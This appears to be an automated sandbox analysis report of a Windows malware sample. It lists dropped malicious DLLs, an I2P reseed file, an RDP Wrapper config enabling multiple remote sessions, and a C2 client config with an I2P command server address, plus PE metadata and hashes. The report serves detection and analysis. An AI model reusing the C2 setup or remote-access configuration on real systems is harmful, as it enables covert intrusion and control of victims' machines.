                                                                                                                SHA-512:CDBCC2FD4195A6FA5A343234A745E3E7A558F68A496D376FDF6A86D585C9FA39A64F0CEB20A2D2E6E30E59BA46F62493E500D6EEB033FA981DAA60F00EE42F14
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....`......\...............................................R.....`... ..............................................................`..................d............................I..(......................h............................text...............................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):92672
                                                                                                                Entropy (8bit):6.242846530333761
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:Eb84+EBwpVmTx3sJg0jsEv5YqKnbGGOO5YhNDE:Eb84+EB7x3sJXwExKb/OOv
                                                                                                                MD5:FDCF93ACD089B505B524DDFA0FF947F9
                                                                                                                SHA1:A2BADA5807BA001758DBCE46DA634332A5CC14C2
                                                                                                                SHA-256:ADFE373F98CABF338577963DCEA279103C19FF04B1742DC748B9477DC0156BB4
                                                                                                                SHA-512:110455DC5C3F090A1341EE6D09D9B327CD03999C70D4A2C0B762B91BC334B0448E750CB1FD7B34CE729B8E1CD33B55A4E1FA1187586C2FF8850B2FD907AFE03E
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....f......\.........Io....................................C.....`... .........................................^....................`..................l............................J..(....................................................text...............................`..`.data...............................@....rdata...U.......V..................@..@.pdata.......`.......<..............@..@.xdata.......p.......F..............@..@.bss....`................................edata..^............P..............@..@.idata...............R..............@....CRT....X............d..............@....tls.................f..............@....reloc..l............h..............@..B........................................................................................................................................................................
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):105984
                                                                                                                Entropy (8bit):6.2884725801282775
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:wPwNKEKbLqYQtCwCxJtpyYNPvo3cxwNn6anP8XOCYA8CSs8qgu06wCYA8CSs8qgm:gwnKvqTaxJtpRP7wNbnP8Xf
                                                                                                                MD5:91A0DD29773FBFB7112C5FCFF1873C13
                                                                                                                SHA1:E1EAF1EFB134CAA7DA5AAA362830A68AB705C023
                                                                                                                SHA-256:AE2D023EBBFEEFD5A26EAA255AD3862C9A1C276BB0B46FF88EA9A9999406D6B6
                                                                                                                SHA-512:F7A665A218BB2CCEC32326B0E0A9845B2981F17445B5CB54BBA7D6EF9E200B4538EBD19916C2DACB0BBE1B409C14A499B23BA707874AE1F1B154279C90DC33DD
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................@......K.....`... .........................................^.......................T............0..h...............................(.......................`............................text...X...........................`..`.data........ ......................@....rdata..Pc...0...d..................@..@.pdata..T............n..............@..@.xdata...............x..............@..@.bss....@................................edata..^...........................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....reloc..h....0......................@..B........................................................................................................................................................................
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):115712
                                                                                                                Entropy (8bit):6.277217301921545
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:UsmIeUIfJAH791hpVMjqZm4S53kp21ahrvffvTn+33333333333333333333333L:I5fJAHZ1Kj7hkUYr3TlX8Y/biF
                                                                                                                MD5:D0F0423AEEE6B6FF6754D860603D46D0
                                                                                                                SHA1:A06F3B9605B3398BA68154DA39ADF26DDEE41743
                                                                                                                SHA-256:81DA68F52DF2ED997C374CCBEFC56849650770FB30EDA8F202BBC7FC3FE6A51D
                                                                                                                SHA-512:C30FAEDE4520FF1C859B8B39E351112CFC60DAECA98B1359F9F86AB79BCFB996BA84F35A5B178B4ABEC66152864720E58F741AE13D06B64913E240A1F9E6A633
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................P............`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):104448
                                                                                                                Entropy (8bit):6.259370376612282
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:VQbC3TviBZTprAFnfkRAJhzTjvlsy2nD+cRi6ZQOobsAx34:VGC3TKBZTWJfImTjx2D+ei6ZQOkx34
                                                                                                                MD5:7A8E8A0842D8D65713DEE5393E806755
                                                                                                                SHA1:AF6F3A52009FBF62C21A290EFC34A94C151B683E
                                                                                                                SHA-256:51C131081921626D22FAF44977D5E4DCFE00E5D6CDDEDA877A82F13631BE7C2E
                                                                                                                SHA-512:D1B8D93B7EFBEAA348D3A01293AD5D92BC8F28EB2554DF5E6E71506D00D135390082C52C18D0BC3F0439B068777D8B2C43AAED930C72E5FFAB2593EEAC470CF4
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\.........?..............................0............`... .........................................^.......................$............ ..l............................v..(.......................`............................text...............................`..`.data...............................@....rdata...a... ...b..................@..@.pdata..$............h..............@..@.xdata..T............r..............@..@.bss.... ................................edata..^............|..............@..@.idata...............~..............@....CRT....X...........................@....tls................................@....reloc..l.... ......................@..B........................................................................................................................................................................
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):115200
                                                                                                                Entropy (8bit):6.220212606349767
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:GQTj0nA3CwwEWLUbltMR8tGZ9G+Yv953a6nfgXqobk5l:GQP02C7LUbltdQG+Yra64Xqo45l
                                                                                                                MD5:BE6174AE2B452DA9D00F9C7C4D8A675B
                                                                                                                SHA1:0ABD2C76C82416AE9C30124C43802E2E49C8ED28
                                                                                                                SHA-256:A62BDF318386AAAB93F1D25144CFBDC1A1125AAAD867EFC4E49FE79590181EBF
                                                                                                                SHA-512:5631B1595F8CEE8C0DFA991852259FEE17EA8B73A9EED900A10450BBB7C846ACFC88C32930BE379D60EFA6AE1BBBEAD0A605A9F36E20129B53BCA36B13BA5858
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........."h.............................P......7F....`... .........................................^....................................@..l...........................@...(.......................h............................text...(...........................`..`.data........0......................@....rdata..`d...@...f...(..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B........................................................................................................................................................................
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):62449
                                                                                                                Entropy (8bit):7.807149241969407
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:uzSVMhnCwJEZ4dJ4douBYaGGIW2QzPzp343mR:vKE29uBFBo2R
                                                                                                                MD5:688FDFAE15F328A84E8F19F8F4193AF2
                                                                                                                SHA1:C65D4CDA0C93B84154DFBC065AE78B9E2F7ECFA8
                                                                                                                SHA-256:8D37FF2458FDE376A41E9E702A9049FF89E78B75669C0F681CFCAFBA9D49688E
                                                                                                                SHA-512:F19BC7F204DBE3449ABE9494BFFF8BE632F20F1B4B8272F0AF71C4CEC344A20617C0909C024CB4A4E0C6B266D386CB127554DC70F3A6AA7A81DAF1A8748F5D2D
                                                                                                                Malicious:false
                                                                                                                Preview:I2Psu3.................................1726476901......reseed@cnc.netPK.........E0Y.L.`........;...routerInfo-CVE7qh1P~hZ~PX2FDY6wRTmrdDd1eQ5Nv7yBC0EcH-o=.dat.^...)....?E4T{w...U........5.x.Z*T.v...C..~m.....r.u.._..0*._>a....B.......1in..o...R...M.....2.0..1...?.&..1@.._.s....KrbA.-..5c..Nzvep.KU.s.n...Gy.E.y...GU.c..A.i.[HU..{I@v..5c.-..53....5..f Kpp..c....:.N..I..u..~~..u....%a........~F>.&.9..I..........\..Ff&..f...!CL!#.!....[.3..:.......J....:..DO...B.l.\gc....r...P__W[..C[......_.d#wG.t....ts.rG. .R.@...b....*c..t..#[...l......D.....<.0...B. ].4...P....(...J...>2.02243....}dll`aan`bj...................%...F..~Q......>....If.a..%..!...E......@...BD...d:..!.b'sDZ.5k^j.g.H\..JI..../..IM,N.N-.:..Z.I"(..$............+..e.....Y..[_...U....t.....n8CEbM...k.%W.^....`i..&[.Y.{}...d.Vn.g..0...PK.........>0Y....:.......;...routerInfo-7xGNdz1Bi17~K7q9lFTjGVPnQdN0tqNJ-xpZt5MSp1Q=.dat{lr...~./..<Yw_...".....%..E.....O..l.(.R<K^...>.i..{.D.s-.+...
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):129024
                                                                                                                Entropy (8bit):6.313152038164236
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:Ex6tEkLvf8H5KRjus59IoZzhoesVR8ssT/nv:mEJ5qoZzfTX
                                                                                                                MD5:C89542ABA45CE1084760AE8DE6EAE09E
                                                                                                                SHA1:603560A3E4B6A8CB906CA98C907373ADBF4D3B1C
                                                                                                                SHA-256:1B6E559DC0CB37EBB2311C7CBF01B039F0DC1C3EC6DA057837451A531B1E2CB0
                                                                                                                SHA-512:60A0EB698AFE25CDDDB133FC937FEE478F1E0F8AF72B825C19BB2D544FAFCC217BABF6DD3D01704A106677E92AAE3DD57538E34731C950DA17F5715DF0732FF6
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.:..........\.........,.....................................,j....`... ...................................... ..^....0..D............................p..l...............................(...................p5...............................text...(9.......:..................`..`.data........P.......>..............@....rdata.......`.......@..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^.... ......................@..@.idata..D....0......................@....CRT....X....P......................@....tls.........`......................@....reloc..l....p......................@..B........................................................................................................................................................................
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:Generic INItialization configuration [SLPolicy]
                                                                                                                Category:dropped
                                                                                                                Size (bytes):441513
                                                                                                                Entropy (8bit):5.449545529389614
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:yUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7N:eJGYB33L+MUIiG4IvREWddadl/Fy/k9u
                                                                                                                MD5:5FCB4B6362E04A8D1C6ECD33AD246FB9
                                                                                                                SHA1:E198D3E81C4B8527451133BCEAFA799D2115A8BB
                                                                                                                SHA-256:060EE1BCB5817709F2D73BB1762C5ABCA09FAF5271E8F90503A84F9657ECDCD9
                                                                                                                SHA-512:B5839D79D1A34DA86BA9B34A9105F7CC05E642C99D84D55E3E88833544DCE9FDD840F7ABF0F09CD4470734F24CA7C600C3C64E4041A4481806590D3B7A6A032D
                                                                                                                Malicious:false
                                                                                                                Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-08-21..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:Generic INItialization configuration [cnccli]
                                                                                                                Category:dropped
                                                                                                                Size (bytes):214
                                                                                                                Entropy (8bit):5.0997449470012635
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:1EVQLD4oeMuJO+70X1YIzODSVkXpTRL9gWVUDeLn:CjogJO+70X1YeCS2X9vgpKL
                                                                                                                MD5:26702FAAB91B6B144715714A96728F39
                                                                                                                SHA1:CBDC34FC8FD3559CD49475FB5BC76176A5F88FF8
                                                                                                                SHA-256:83D30846DD5576DE38A512B17163419D22FF35F2F5B0FE613C401E8A5A25B7A4
                                                                                                                SHA-512:50D35D3DCD60B6E57C1A277E6C3E7AFBB5C2B46425732FC5A9FD3C0A55FEBF5AB3F05411A83CEC230AAC40199774FF78F30848D57D1E04A11B9E60777B038289
                                                                                                                Malicious:false
                                                                                                                Preview:[main]..version=400004957b19a09d..[cnccli]..server_host=c21a8709..server_port=41674..server_timeo=15000..i2p_try_num=10..i2p_sam3_timeo=30000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1835008
                                                                                                                Entropy (8bit):4.465603481655458
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:ZIXfpi67eLPU9skLmb0b45WSPKaJG8nAgejZMMhA2gX4WABl0uNXdwBCswSbh:qXD945WlLZMM6YFHx+h
                                                                                                                MD5:31DBDF481BD3D510E00AF55D51A1DC05
                                                                                                                SHA1:12A01B1293A8A50F036188908564B6F01B1C2CDB
                                                                                                                SHA-256:6C4FCD850C9E1FA9C798D9380416888995BA750F02C87D8C029C5A95256C8BFE
                                                                                                                SHA-512:5C712395807639259296A25A12C46A4D63642D3FEC74865816CA3DBEED1367227D4A8E5C9684FA36BB2ADEDA2E610372428F68ACE3C4A0CF96EBB2DCD55C9F8B
                                                                                                                Malicious:false
                                                                                                                Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmV..z...................................................................................................................................................................................................................................................................................................................................................N........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                Entropy (8bit):6.026200028456233
                                                                                                                TrID:
                                                                                                                • Win64 Executable GUI (202006/5) 92.64%
                                                                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                                                                • VXD Driver (31/22) 0.01%
                                                                                                                File name:file.exe
                                                                                                                File size:5'654'528 bytes
                                                                                                                MD5:31d649663149dabd99c51b71e60a4a91
                                                                                                                SHA1:f5f515e1818388c9360bde15a7dfcb265e86a812
                                                                                                                SHA256:2acb9052db5b304a822f8cd1169e31327e967e06ff78064997ea8a5003e783ec
                                                                                                                SHA512:9cd1b7f923f37a620074c2c8dfb79558429e53a6b789ab58917889404dcad505b102a784946dbd9b0bc85ab4eb751af8c33e0c0480bb21619e5d38bef668cc63
                                                                                                                SSDEEP:49152:eDShb1KwGF4Ilow5sADndfK0IptgSoP6MRM2BTXwmlPJmqHc4a/:LQK0/lX9PJhHc
                                                                                                                TLSH:34463A3F72A4C269C15EC17FC1A7CF40E533B9795B33C6E742A106689A168C75EBE620
                                                                                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7.......................................................................................................................................
                                                                                                                Icon Hash:1f6c6cececf16117
                                                                                                                Entrypoint:0x83d530
                                                                                                                Entrypoint Section:.text
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                DLL Characteristics:
                                                                                                                Time Stamp:0x67040F91 [Mon Oct 7 16:42:57 2024 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:5
                                                                                                                OS Version Minor:2
                                                                                                                File Version Major:5
                                                                                                                File Version Minor:2
                                                                                                                Subsystem Version Major:5
                                                                                                                Subsystem Version Minor:2
                                                                                                                Import Hash:bf7e94a88b651f53cc57bdb23fcd2c2f
                                                                                                                Instruction
                                                                                                                push ebp
                                                                                                                dec eax
                                                                                                                sub esp, 20h
                                                                                                                dec eax
                                                                                                                mov ebp, esp
                                                                                                                nop
                                                                                                                dec eax
                                                                                                                lea ecx, dword ptr [FFFEF838h]
                                                                                                                call 00007F3410BE6410h
                                                                                                                dec eax
                                                                                                                mov eax, dword ptr [0005F064h]
                                                                                                                dec eax
                                                                                                                mov ecx, dword ptr [eax]
                                                                                                                call 00007F3410E99D41h
                                                                                                                dec eax
                                                                                                                mov eax, dword ptr [0005F055h]
                                                                                                                dec eax
                                                                                                                mov ecx, dword ptr [eax]
                                                                                                                mov dl, 01h
                                                                                                                call 00007F3410E9C9F0h
                                                                                                                dec eax
                                                                                                                mov eax, dword ptr [0005F044h]
                                                                                                                dec eax
                                                                                                                mov ecx, dword ptr [eax]
                                                                                                                dec eax
                                                                                                                mov edx, dword ptr [FFFEF0CAh]
                                                                                                                dec esp
                                                                                                                mov eax, dword ptr [0005F5D3h]
                                                                                                                call 00007F3410E99D43h
                                                                                                                dec eax
                                                                                                                mov eax, dword ptr [0005F027h]
                                                                                                                dec eax
                                                                                                                mov ecx, dword ptr [eax]
                                                                                                                call 00007F3410E99F54h
                                                                                                                call 00007F3410BDDE1Fh
                                                                                                                jmp 00007F341100C30Ah
                                                                                                                nop
                                                                                                                nop
                                                                                                                call 00007F3410BDE016h
                                                                                                                nop
                                                                                                                dec eax
                                                                                                                lea esp, dword ptr [ebp+20h]
                                                                                                                pop ebp
                                                                                                                ret
                                                                                                                dec eax
                                                                                                                nop
                                                                                                                dec eax
                                                                                                                lea eax, dword ptr [00000000h+eax]
                                                                                                                dec eax
                                                                                                                sub esp, 28h
                                                                                                                call 00007F3410BDD5ACh
                                                                                                                dec eax
                                                                                                                add esp, 28h
                                                                                                                ret
                                                                                                                int3
                                                                                                                int3
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x4ae0000x97.edata
                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x4a80000x48de.idata
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x52a0000x4b400.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x4eb0000x3e9c4.pdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x4b10000x39178.reloc
                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x4b00000x28.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x4a92c00x1130.idata
                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x4ad0000xe3c.didata
                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                .text0x10000x43c5c00x43c6004dc050f2b4f53a64168d2d2b3bb04cf6unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                .data0x43e0000x5ee380x5f000c96c0455df11a9306f23138f836838b1False0.22957699424342104data4.71291425546474IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .bss0x49d0000xaab40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .idata0x4a80000x48de0x4a00586f243f7059a7c5e3cc1599e712e400False0.24266258445945946data4.353393974383116IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .didata0x4ad0000xe3c0x1000cffac5f732be0532b2a4d072e873b001False0.2392578125data3.075608222202654IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .edata0x4ae0000x970x20032e00411291ba873b0de75e561276889False0.251953125data1.8329856927687613IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .tls0x4af0000x1e40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .rdata0x4b00000x6d0x200cb0aedb4d69d2e7d3f915611730f186cFalse0.1953125data1.375717479766274IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .reloc0x4b10000x391780x392003895bdffdd7a3e7f1d857eb7488e8413False0.469976579595186data6.475527769134284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                .pdata0x4eb0000x3e9c40x3ea006086c296052ff020a33a7ba75c81e109False0.491813248502994data6.369980557431763IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .rsrc0x52a0000x4b4000x4b4007cd7c843107b0c985a216d5520dc5729False0.5633175872093024data6.403199046558459IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                RT_CURSOR0x52aca80x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                RT_CURSOR0x52addc0x134dataEnglishUnited States0.4642857142857143
                                                                                                                RT_CURSOR0x52af100x134dataEnglishUnited States0.4805194805194805
                                                                                                                RT_CURSOR0x52b0440x134dataEnglishUnited States0.38311688311688313
                                                                                                                RT_CURSOR0x52b1780x134dataEnglishUnited States0.36038961038961037
                                                                                                                RT_CURSOR0x52b2ac0x134dataEnglishUnited States0.4090909090909091
                                                                                                                RT_CURSOR0x52b3e00x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                RT_ICON0x52b5140xea8Device independent bitmap graphic, 48 x 96 x 8, image size 26880.4147121535181237
                                                                                                                RT_ICON0x52c3bc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 11520.476985559566787
                                                                                                                RT_ICON0x52cc640x568Device independent bitmap graphic, 16 x 32 x 8, image size 3200.48554913294797686
                                                                                                                RT_ICON0x52d1cc0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.5167012448132781
                                                                                                                RT_ICON0x52f7740x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.5719981238273921
                                                                                                                RT_ICON0x53081c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.7109929078014184
                                                                                                                RT_STRING0x530c840x8b0data0.2648381294964029
                                                                                                                RT_STRING0x5315340x2e4data0.4540540540540541
                                                                                                                RT_STRING0x5318180x2a4data0.4896449704142012
                                                                                                                RT_STRING0x531abc0x200data0.53125
                                                                                                                RT_STRING0x531cbc0x1f0data0.5
                                                                                                                RT_STRING0x531eac0x378data0.43243243243243246
                                                                                                                RT_STRING0x5322240x390data0.39144736842105265
                                                                                                                RT_STRING0x5325b40x2f0data0.4242021276595745
                                                                                                                RT_STRING0x5328a40x488data0.3905172413793103
                                                                                                                RT_STRING0x532d2c0x4e4data0.39217252396166136
                                                                                                                RT_STRING0x5332100x3a4data0.4034334763948498
                                                                                                                RT_STRING0x5335b40x34cdata0.40165876777251186
                                                                                                                RT_STRING0x5339000x390data0.3355263157894737
                                                                                                                RT_STRING0x533c900x3e0data0.43850806451612906
                                                                                                                RT_STRING0x5340700x38cdata0.31167400881057267
                                                                                                                RT_STRING0x5343fc0x3e0data0.42439516129032256
                                                                                                                RT_STRING0x5347dc0x184data0.5412371134020618
                                                                                                                RT_STRING0x5349600xd4data0.660377358490566
                                                                                                                RT_STRING0x534a340x214data0.5
                                                                                                                RT_STRING0x534c480x3c8data0.3822314049586777
                                                                                                                RT_STRING0x5350100x3f4data0.391304347826087
                                                                                                                RT_STRING0x5354040x47cdata0.3423344947735192
                                                                                                                RT_STRING0x5358800x28cdata0.34662576687116564
                                                                                                                RT_STRING0x535b0c0x454data0.41064981949458484
                                                                                                                RT_STRING0x535f600x4b4data0.3953488372093023
                                                                                                                RT_STRING0x5364140x4ccdata0.34446254071661236
                                                                                                                RT_STRING0x5368e00x3b0data0.3792372881355932
                                                                                                                RT_STRING0x536c900x3d8data0.34146341463414637
                                                                                                                RT_STRING0x5370680x35cdata0.37906976744186044
                                                                                                                RT_STRING0x5373c40xd0data0.5721153846153846
                                                                                                                RT_STRING0x5374940xa0data0.65
                                                                                                                RT_STRING0x5375340x394data0.4268558951965066
                                                                                                                RT_STRING0x5378c80x434data0.3308550185873606
                                                                                                                RT_STRING0x537cfc0x390data0.37609649122807015
                                                                                                                RT_STRING0x53808c0x2dcdata0.38114754098360654
                                                                                                                RT_STRING0x5383680x34cdata0.3246445497630332
                                                                                                                RT_RCDATA0x5386b40x10data1.5
                                                                                                                RT_RCDATA0x5386c40x3bbb7dataEnglishUnited States0.6175269656629732
                                                                                                                RT_RCDATA0x57427c0xb78data0.4778610354223433
                                                                                                                RT_RCDATA0x574df40x151Delphi compiled form 'TForm1'0.7210682492581603
